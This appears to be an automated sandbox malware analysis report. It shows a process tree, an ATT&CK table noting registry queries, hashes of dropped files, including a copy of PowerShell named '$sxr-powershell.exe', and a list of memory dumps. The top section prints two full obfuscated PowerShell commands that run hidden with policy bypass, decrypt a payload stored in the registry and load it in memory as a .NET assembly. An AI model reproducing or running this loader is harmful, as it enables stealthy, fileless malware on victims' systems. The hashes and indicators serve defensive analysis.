'')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:1968

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:3604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u0v42kth.fq0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll
Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll
Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll
Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/332-351-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/332-347-0x0000019C503C0000-0x0000019C503E7000-memory.dmp

Filesize
156KB

Download
memory/332-352-0x0000019C503C0000-0x0000019C503E7000-memory.dmp

Filesize
156KB

Download
memory/392-361-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/392-360-0x0000023653760000-0x0000023653787000-memory.dmp

Filesize
156KB

Download
memory/392-410-0x0000023653760000-0x0000023653787000-memory.dmp

Filesize
156KB

Download
memory/412-356-0x00000255D0ED0000-0x00000255D0EF7000-memory.dmp

Filesize
156KB

Download
memory/412-357-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/596-342-0x00000240A3280000-0x00000240A32A7000-memory.dmp

Filesize
156KB

Download
memory/596-336-0x00000240A3280000-0x00000240A32A7000-memory.dmp

Filesize
156KB

Download
memory/596-334-0x00000240A3250000-0x00000240A3271000-memory.dmp

Filesize
132KB

Download
memory/596-337-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/624-415-0x0000025768E90000-0x0000025768EB7000-memory.dmp

Filesize
156KB

Download
memory/624-366-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/624-365-0x0000025768E90000-0x0000025768EB7000-memory.dmp

Filesize
156KB

Download
memory/680-345-0x000001E0DCBD0000-0x000001E0DCBF7000-memory.dmp

Filesize
156KB

Download
memory/680-338-0x000001E0DCBD0000-0x000001E0DCBF7000-memory.dmp

Filesize
156KB

Download
memory/680-341-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/956-350-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/956-349-0x000002C1F4BD0000-0x000002C1F4BF7000-memory.dmp

Filesize
156KB

Download
memory/1060-419-0x0000022E62900000-0x0000022E62927000-memory.dmp

Filesize
156KB

Download
memory/1060-369-0x0000022E62900000-0x0000022E62927000-memory.dmp

Filesize
156KB

Download
memory/1060-371-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1072-375-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1072-372-0x000001AFB35C0000-0x000001AFB35E7000-memory.dmp

Filesize
156KB

Download
memory/1072-423-0x000001AFB35C0000-0x000001AFB35E7000-memory.dmp

Filesize
156KB

Download
memory/1084-377-0x000001651D2C0000-0x000001651D2E7000-memory.dmp

Filesize
156KB

Download
memory/1084-428-0x000001651D2C0000-0x000001651D2E7000-memory.dmp

Filesize
156KB

Download
memory/1140-303-0x000001E7A0280000-0x000001E7A0290000-memory.dmp

Filesize
64KB

Download
memory/1148-152-0x00007FFC8DAD0000-0x00007FFC8DB8E000-memory.dmp

Filesize
760KB

Download
memory/1148-142-0x0000015752190000-0x00000157521B2000-memory.dmp

Filesize
136KB

Download
memory/1148-243-0x00000157379F0000-0x0000015737A00000-memory.dmp

Filesize
64KB

Download
memory/1148-244-0x00000157379F0000-0x0000015737A00000-memory.dmp

Filesize
64KB

Download
memory/1148-149-0x00000157379F0000-0x0000015737A00000-memory.dmp

Filesize
64KB

Download
memory/1148-148-0x00000157379F0000-0x0000015737A00000-memory.dmp

Filesize
64KB

Download
memory/1148-242-0x00000157379F0000-0x0000015737A00000-memory.dmp

Filesize
64KB

Download
memory/1148-153-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/1148-147-0x00000157379F0000-0x0000015737A00000-memory.dmp

Filesize
64KB

Download
memory/1148-151-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/1224-434-0x000002069BA30000-0x000002069BA57000-memory.dmp

Filesize
156KB

Download
memory/1252-185-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/1252-181-0x00007FFC8DAD0000-0x00007FFC8DB8E000-memory.dmp

Filesize
760KB

Download
memory/1252-178-0x0000020BD5510000-0x0000020BD5520000-memory.dmp

Filesize
64KB

Download
memory/1252-179-0x0000020BD5510000-0x0000020BD5520000-memory.dmp

Filesize
64KB

Download
memory/1252-299-0x0000020BF1960000-0x0000020BF1B22000-memory.dmp

Filesize
1.8MB

Download
memory/1252-315-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/1252-296-0x0000020BF15C0000-0x0000020BF1610000-memory.dmp

Filesize
320KB

Download
memory/1252-297-0x0000020BF16D0000-0x0000020BF1782000-memory.dmp

Filesize
712KB

Download
memory/1252-180-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/1252-177-0x0000020BD5510000-0x0000020BD5520000-memory.dmp

Filesize
64KB

Download
memory/1252-186-0x00007FFC8DAD0000-0x00007FFC8DB8E000-memory.dmp

Filesize
760KB

Download
memory/1264-439-0x0000018C5CA00000-0x0000018C5CA27000-memory.dmp

Filesize
156KB

Download
memory/1332-443-0x000001F0B27B0000-0x000001F0B27D7000-memory.dmp

Filesize
156KB

Download
memory/1648-301-0x0000017E9C720000-0x0000017E9C730000-memory.dmp

Filesize
64KB

Download
memory/1648-302-0x0000017E9C720000-0x0000017E9C730000-memory.dmp

Filesize
64KB

Download
memory/1796-155-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/1796-157-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/1968-304-0x00000238EABD0000-0x00000238EABE0000-memory.dmp

Filesize
64KB

Download
memory/2688-330-0x00007FFC8DAD0000-0x00007FFC8DB8E000-memory.dmp

Filesize
760KB

Download
memory/2688-329-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/2688-319-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2688-317-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2688-331-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2728-248-0x0000027E73A70000-0x0000027E73A80000-memory.dmp

Filesize
64KB

Download
memory/3604-305-0x00000189804C0000-0x00000189804D0000-memory.dmp

Filesize
64KB

Download
memory/3896-247-0x0000022C4DC80000-0x0000022C4DC90000-memory.dmp

Filesize
64KB

Download
memory/4952-298-0x0000014B2A2F0000-0x0000014B2A300000-memory.dmp

Filesize
64KB

Download
memory/4952-300-0x0000014B2A2F0000-0x0000014B2A300000-memory.dmp

Filesize
64KB

Download
memory/4984-245-0x000001F9AB950000-0x000001F9AB960000-memory.dmp

Filesize
64KB

Download
memory/4984-246-0x000001F9AB950000-0x000001F9AB960000-memory.dmp

Filesize
64KB

Download
memory/5052-249-0x000001B6DFF30000-0x000001B6DFF40000-memory.dmp

Filesize
64KB

Download